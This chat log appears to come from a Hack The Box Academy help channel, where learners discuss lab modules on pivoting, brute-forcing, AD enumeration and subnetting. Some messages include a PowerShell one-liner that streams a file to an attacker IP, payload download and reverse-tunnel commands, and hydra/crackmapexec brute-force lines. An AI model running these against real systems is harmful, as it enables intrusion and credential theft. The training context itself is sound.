like here i see that there is the proces on the machine, i just want to know if the point of the exercie was to search for default creds or if there was a certain command to see the creds

password cracking module default cred section

question is "i already have the awnser btw"

well maybe check for open ports and try default credentials

What a good note taking app for studying in the academy?
I have reached the end of echoing into files

it'll be a preference thing I have used onenote, notion and I am now on Cherrytree which I like as you can use it on all OS types

Most learners are using Obsidian (some Notion), it really depends on your need.

I like open source (free) I hear obsidian is fairly good

If askin' what to use?, go for Obsidian.

I wouldn't use notion, I found when trying to collate all my notes it was a real pain unless you have a subscription

Yeah I am just asking to see what people are using nowadays

I mostly saw CT / Notion and ofc Obsidian.

I have like 7-8 years of CTF, course and work related notes, thing I regret is having them all over the place even now so when I am looking for something specific it can be a pain, especially if its on pen and paper (don't judge I was new lol)

Heard many people complain about its subscription model
But yeah as someone coming from paper/file note taking I would prefer FOSS so I can customize it

I think they are the most common

Cool, would look into it

Notion for Studying notes. Obsidian for sensitive stuff

Yes Very common.

I have an issue in Nmap module where in 03 page it is asking for question but there is no machine or IP available for scanning?

@naive sage welcome to modules channel

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Which ip should come to <InternalIPofPivotHost> in the command.

Attack Host ----ssh ----- ubuntu --> Windows machine
Ubuntu and Windows machine on the same network. Attack host only has ssh connection with ubuntu

Thanks.

what is the question and is it module Network Enumeration with Nmap?

Seems like it is asking for answer based on above results.

Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. this one?

Yes. right this one

have you had a look at the hint?

holy moly
how was i living before this
thanks bro!

Your welcome.

the ip of the ubuntu machine that starts with 172 iirc

@midnight galleonYes, I wrote that. I connected to the Windows machine the old fashioned way, by creating a tunnel. Because there is no program on the ubuntu machine that I can connect with rdp. I did everything right but the reverse shell meterpreter session does not come up, I guess it might be confused because I created these 2 tunnels

The hint and some research literally gives you the answer

ideally the ubuntu host, but be aware that in the greater sense your pivot approach may dictate otherwise (you often will not have a linux device hanging out on an windows network in a real world scenario) you can ssh with powershell or cmd.exe though

which xreerdp returned nothing? also you should be able to apt install if it can reach the internet? arent you ssh'ing? why the need for rdp?

@quiet troutYou're right, but that's not the point. I've solved the room, but I'm trying the things it shows in the room, but it's not working. It's incomplete.
1- We create a payload from msfvenom from the attack host and send it to the ubuntu machine via ssh.
2- We create python server from ubuntu server and send this payload to windows machine.
3--Invoke-WebRequest -Uri “http://172.16.5.129:8123/backupscript.exe” -OutFile “C:\backupscript.exe”
command to download and run the payload.
4-ssh -R <InternalIPofPivotHost>:8080:0.0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
and at the same time I am listening from the atack host but there is no connection.

Also the logic in the room seems wrong to me. I already need to create a bridge with extra ssh to reach the windows machine because I can't connect to windows from the ubuntu machine because there are no tools and they are not downloaded from the internet.

Not looking at the module, but im not sure i follow your attack flow there, step 3 appears create a request (GET?) which downloads the payload but does not run it, is there more thats not there?

createing a web req on the ubuntu server would download the file locally though? perhaps you need to use the python server to SERVE the python request (script?) then retrieve it from the windows machine and run it?

@solar grove ^

Good

Module: Windows Privilege Escalation
Section: Event Log Readers
Link to section: https://academy.hackthebox.com/module/67/section/602

In this section, it states the following:

Note: Searching the Security event log with Get-WinEvent requires administrator access or permissions adjusted...

What's the point of if administrator permissions are required? I'm assuming you'll need administrative privileges to modify the registry key too?

it can contain other creds

Oh, right, that slipped my mind. But wouldn't it be simpler to just use wevtutil? Or this is like in-case that doesn't work?

you can use wevtutil

SOC Analyst -> Windows Attacks/Def -> ACLs

https://academy.hackthebox.com/module/176/section/1789

I'm having a hard time exfiling the sharphound output zip to the pwnbox to visualize the data from the windows box...

here's my approach... a powershell stream back to the pwnbox with nc

$client = New-Object System.Net.Sockets.TcpClient("10.10.15.58", 9001); $stream = $client.GetStream(); $writer = New-Object System.IO.StreamWriter($stream); $writer.Write([System.IO.File]::ReadAllText("c:\users\bob\downloads\bh.zip")); $writer.Flush(); $writer.Close(); $stream.Close(); $client.Close();

the nc listener just stays running... even tho the zip is only 13kb

is bloodhound installed on the windows machine? cant find it, or perhaps another less error prone way to do this?

why not just mount a drive over rdp or host a smb server

im being lazy -_-

but im kinda out of options aint shit working prob firewall

actually i dont think i've done drive mount over rdp before

https://www.mankier.com/1/xfreerdp#Options-/drive

thx, this didnt turn up when i just tried a google. im using DDG tho maybe that why

wow this is quite easy

@next bronze capital idea, putting some respect on yo name.

for finding stuff, always use google.

yes, i did.

Any one able to give me some help with Abusing HTTP Misconfigirations Skills assessment - Hard?

Feel free to send me a DM

hello, I'm having issues with my nmap scan. I'm still new and would like to know if anyone had nmap scans take 10+ mins.

what's the exact command , did you use -T ?

{ip} -p- -sV

i'm currently using pwnbox

-p- will scan all the TCP ports , you can use -T4 to make it faster

@limber river what does -t4 do?

-T<0-5>: Set timing template (higher is faster)

use the help or check this https://nmap.org/book/man-briefoptions.html

Can anyone help me with “Windows Lateral Movement
\ Skills Assessment” I'm stuck on the question ‘What is the password for VNC?’. I did everything right and even wrote to support, they told me to do what I already tried to do, apparently it's a bug, but then they just told me to email them and that's it.

Hey guys anyne know if i an use a username list with crackmap?

remove the dot and write the full path to the dictionary.

Yes you can use a username list with CME.

mb i used the wrong path do you guys know why ./crafted.txt don't work?

for crackmap do i need to use full path?

no need for ./

depending on where crafted.txt is located

oh yeah it was notin this directory oes

maybe there's some special channel for such questions, or is this it?

You are in the correct channel. I haven't done that module, otherwise I would give you some information.

Have you granted yourself admin privs? If so, just run the same commands as the module

You have to do it in the VNC server not the client

Where is it located? Isn't it on the support server?

No

Backup

After all, that's the only place WSUS has access to

It's not pinging from any server

Did you get access to Backup?

bloodhound module
SharpHound - Data Collection from Windows
when i runas /netonly /user:INLANEFREIGHT\htb-student cmd.exe
it asks us for password which isnt available

No, because there's no way to reach it, even with wsus there's no response from it

The module is pretty much structured as to jump from one host to another

Push an update to grant you access

i accidently cleared the term with the password -_- do you guys know how to save the positive user and pwd with crackmap? i guess if i do > creds.txt also the failures will be in there?

like pw reverse shell?

What device blocks network access or traffic?

Firewall?

The most basic one anyways

hi dear member I just joined the platform and I wanted a mentor to guide me in learning

There’s your answer

So I have to push an update to disable the firewall?

wtf xdd

You will need admin privs to read the registry after

ChatGPT can give you the specific command

if i press enter anyway it works but it gives non domain cmd

Thank you so much bro, I didn't think they'd be so hardcore.

The rest is pretty straightforward

This is very strange, if there is a firewall on the server, why is it not pinging from wsus? But it is still possible to release updates.

Would you block windows update on your servers?

But to answer your question, there were some people that found some ports available and got a shell differently

I scanned all ports and found nothing, but it was from support server, maybe there is something with wsus.

guys is it possible that you cant connect with every useraccount on winrm?

i found some credentials but cant log to winrm

Need to be a member of the “Remote Management Users” group

okej thanks for the info

SOC Analyst -> Windows Attacks/Defense -> ESC1

https://academy.hackthebox.com/module/176/section/1790

Cannot rdp to ws001 from kali, trust relationship between workstation and domain has failed type error

I've reset box twice now, can someone try and rdp to this machine for me as a sanity check?

I am having a hard time wrapping my head around CIDR. Why would it be /26 for an ip address of 192.168.12.160. Why wouldn't it be /27 since the last octect needs both the 128 and the 32 place to make ip address?

i have a question , what im not chat in #general ? , i dont know 😦

Hey guys can you help? I do the same then in the lab but i cant copy it?

i know that there is the crackmapexec method but i want to try this one to

so you have a 2^6=x-1 range for hosts per subnet, 64 (or 62 however you prefer to look at it) each, starting at 0, 0-63,63-127 and so forth

so addy 192.168.12.160 is in the range of your 4th and final subnet, which ends at 191, i dont follow the last part... with CIDR you're subnetting based on need of devices per subnet.

Have a look at this chart it might help

You can try opening a CMD session and see if it will error out
I’ve had some error with WinRM in the past (which I think were due to how it handles connection, but that’s another thing to discuss) which I resolved having a CMD reverse shell via Netcat

ah, ok. Thank you!

you can do this quick by subtracting the total bits (32) minus your range, and squaring it.... if you are tested you will see something like.... what is the first valid host on the 192.168.173.193/30 subnet.

you should be able to do these in your head, a good quizzing site is like this:
https://www.subnetting.net/Start.aspx

its basically mandatory to be able to work these out quickly and correctly for the ccna...

i say "should" bc most people (yours truly included) learned this stuff for certs/exams but im finding myself unable to do them rapidly after years of non-use (we use calculators or whatever in real world so it never comes up)

@elder saddle ^

I appreciate that. That's definitely something I need to work on.

idk its weired know i have this

You don’t need to use cmd /c in this situation

Just use move or copy

Also evil-winrm has a download feature, but it’s kinda slow

hello everyone. I'm studying the Web Fuzzing module, and I've come to where Wenum explains. When I try to install the tool as described via the pipx command it doesn't work.

Hey kids

I hope I'm asking for help in the right place

still looking for help here regarding an rdp sanity check if anyone has access and would be so kind... #modules message

i am not able to connect remote host using ''HTB_@cademy_stdnt" password. anyone here for helping me

Yeah that’s why you need to move the copy

Not the real one

BUT QLSO THIS ONE DONT ZORK

my bad for caps

Did you make a ntds directory first?

I don’t see one

its just the shadow copy that dont want to work

What’s wrong with the copy

when i do it i don"t have the file so i cant transfer it to my smb share

i have a ntds.dit in the windows\ntds\

but in the module they show to use the command i just did

Alr imma try it out

thanks ^^

doesnt looks like the normal copy works but just like the example, cmd /c works

here it looks like it worked but you didnt make a ntds directory first

gonnq try again

I just directly used cme on that one 😂😂😂

HTB_@cademy_stdnt!

okej you were right but know how to avoid this ^^ so i can see the hashes and decrypt them with hashcat

u cant copy ntds.dit

because it's always used by the process

by lsass

u need to use secretsdump.py

wtf

Yeah use secretsdump

you can use shadowcopy to copy it normally.

not on syste;

is it a repo or something? never used it before

it's in the impacket.

They used the tool in the SAM section

ow okje but i need the system file to i will check that later thanks for you help both of you

can someone help me, im trying to do the linux fundementals and for the first question of find files and directories i cant get the answer. I even googled a guide and ran the command suggested in the guide but i get no file. question is "What is the name of the config file that has been created after 2020–03–03 and is smaller than 28k but larger than 25k?"

im running the terminal command find / -iname "*.conf" -size +25k -size -28k -newermt 2023-03-03 2>/dev/null and i get nothing

you put 2023 instead of 2020

thank you

guys i'm doing the bruteforce module and the python script given "pin-solver.py" for the first section keep crashing any idea ?

Crashing can mean anything. If you're getting any feedback you'd have to provide the details. Typically with Python it's a stacktrace.

https://academy.hackthebox.com/module/54/section/511
for the question number 1,should i add the ip in my hosts?

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 203, in _new_conn
sock = connection.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 85, in create_connection
raise err
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 73, in create_connection
sock.connect(sa)
TimeoutError: [Errno 110] Connection timed out

its crash after a few attempts

Hi guys

Im on the password mutations challenge and I used this command

This suggests you're unable to make a connection to the remote system. I haven't done this module and don't understand the broader context of pin-solver.py, but I would check that you're specifying the correct address and port and that the system on which you're running the python script is able to communicate with that system in the way it expects.

I used the password.list from the resources provided by htb

its working it sends lets say 200 or 300 tries then crash

here is my command

to brute force the ssh

Again, I haven't done the module but I might ask if there's a way to throttle the requests, extend the timeout period or if you can identify that the service/server is becoming unrespnosive for other reasons.

nvm i found the flag i had to change the script to start where its crashed when restarting

Excellent! Great solution.

yea, good thinking

i don't remember the challenge but its worth looking for another service running no ?

thanks bro

this one says ssh specifically 😅

@pine dune Sorry to chop up your question. Sounds like you've done everything right so far and I'll bet you're wondering why it's going to take 90 days to crack ssh

Consider if other services might use the same authentication mechanism on the back end.

maybe the user is lazy ?

yeah its taking longer than usual...knowing htb they dont spend long for us in enumeration so i thought whats up lol

okay cool, u mean what @rocky estuary is suggesting?

😉

haha that'd be good for us

thank you...im a little new to enumeration and I hate it. What service would u recommend I enumeratee instead of ssh?

maybe ftp?

maybe 🤷‍♂️

I would suggest you try them all and figure out which is fastest, using which tool, and with what options.

haha thank u, I'll give it a shot!

okay thanks

what exactly are threads?

yea, like this challenge specifically I took the opportunity to figure out what every tool was good at cracking and note my preferences down for the service. i know it's tedious but you learn a lot.

Threads are separate processes that belong to the same program.

thank you sounds like I'll do that too

could you please elaborate 😅

E.g. If you have one thread, it can try one password until it receives results... ifyou have 10 threads each of those 10 threads can try a different password.

in parallel

more threads = more speed but its also will require more resources from your machine

ahh okay thank you

thank you

Right, as SORA notes you'll choke either your computer or the network or the service at some point if you floor it.

ahh I see

whats a decent number of threads? someone told me 48?

why am I getting errors 😭

For this challenge 48 is probably good, but it's entirely sensitive to the environment at the time.

ahh ok, any ideas for the errors above? all i changed was the sservice if i know correctly

i suggest using hydra for everything else but winrm and smb

plus thats not a windows machine

This shows that you're authenticating with the user "\sam". When authenticating against SMB you've always got to provide a workgroup or domain. E.g. "SOMETHING\sam".

try .txt instead of list

okay thanks

There are 3 options to do this with netexec / crackmapexec

change ext, It might read it wrong

ahh yes thank you

.list > .txt

ok ill try txt

no

the mut password is saved as .list tho

No? Go on...

wait

smb, he uses ftp

In the image he shared he is using CME with SMB. You're right for FTP.

okay then

do I have to enumerate an smb workgroup for sam?

did you read module?

No, CME will identify the workgroup or hostname if you use the, I think it's, --localhost flag. (edit: oops, no, it's something else but still a good enough hint)

yeah I did but I read it a while ago and coming back to the question today

It's not cheating to go back and reference things.

read again...

okay Ill try that

okay

cme smb IP -u '' -p'' --users

-u guest

yea the username is sam in question

okay, and if you use list of password, then provide .txt file

it doesn't recognize .list

ok so change it to .txt? ill do that

yeah

thanks, lemme try

guys i figured out why it wasnt working

I wasnt in the correct folder

I don’t think this is true

crackmapexec ftp 10.129.21.126 -u sam -p mut_password.txt

I used this and boy did it give results instantaneously

think all of them are coming back red tho

And I’d use netexec instead of cme

Cme is no longer maintained

ok ill try netexec

ill try hydra first since its in my notes

IMO, someone on HTB's payroll (@blissful verge? @gilded lion?) needs to straight-up sed -i 's/crackmapexec/nxc/g' all the module content. There's more outdated stuff where that came from (i.e. a clear lack of Ligolo content in the pivoting module), but at least that would bring everything up to code.

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-04 19:45:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ftp://10.129.21.126:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 93756 to do in 05:26h, 16 active
[STATUS] 154.67 tries/min, 464 tries in 00:03h, 93590 to do in 10:06h, 6 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-04 19:48:51

try to go back to the .list to see if that make any difference + try to change the vpn

is it normal that the dmz box in attacking enterprise module dies when running rpcinfo?

Here we go again... lol

did you format it correctly?

https://unix.stackexchange.com/a/734936/115433
that worked for me

hey, i'm looking for help for windows evasion about running seatbelt in memory. I've tried multiple way to patch amsi and it seems it worked but can't run seatbelt after

Silly question.... on AD Attacks Module - Enumerating from Windows. When using BloodHound to find how many Kerberoastable accounts, may I assume that we just count the nodes? That's what I did at least.

@rough comet Your query is correct

Or does Bloodhound show just the number, somehow, somewhere?

You may use that and a few other methods to find the users you can kerbroast

right right

If its not too many just count it

but there is no obscure feature that shows just the number? Yeah, I got the answer, just wanted to know

It is rather ineffecient to do it at scale though

Got it!

Ok, so just count!

But I do believe Bloodhound CAN show kerbroastable users as a view

hmmm

Let me make sure

interesting

https://gist.github.com/seajaysec/a4d4a545047a51053d52cba567f78a9b

If you get a lot of results add | wc -l to count them all

Okay so this is a custom view that someone made

off topic but related... I could not use xfreerdp... I've had RDP issues the whole week. Never used rdesktop till now. Was the only workaround.

Please check your DMs

Hello Guy
I have been having issues with Windows Event Logs session
after Analyzing the event with ID 4624, that took place on 8/3/2022 at 10:23:25I the only executable i found was services.exe
However, it is showing that is not the answer . any idea on what will be the right answer ?

Hello i guess the question was already asked but are there problems with xfreerdp?

Ok I got what should be an easy question. I am trying to submit a flag on the Nmap Module, Nmap Scripting Engine Section. I have the flag ||H...}.|| I cut and paste it ensure no spaces are on the front or tail of the string. I keep getting a response it's the wrong answer. What am I missing? 🙂

u sure no spaces? 😉

appearntly yes

i've trippled check but I'll give it another go

lemme check the section rq

No spaces

what is the first char between {}

p

wrong

its not this one search

for other scripts

scripting section right?

Nmap Scripting Engine section

repeate ur enumeration

Really? A false flag eh. lol Ok I'll keep looking.

weird tho

can u DM me how u find it? im curious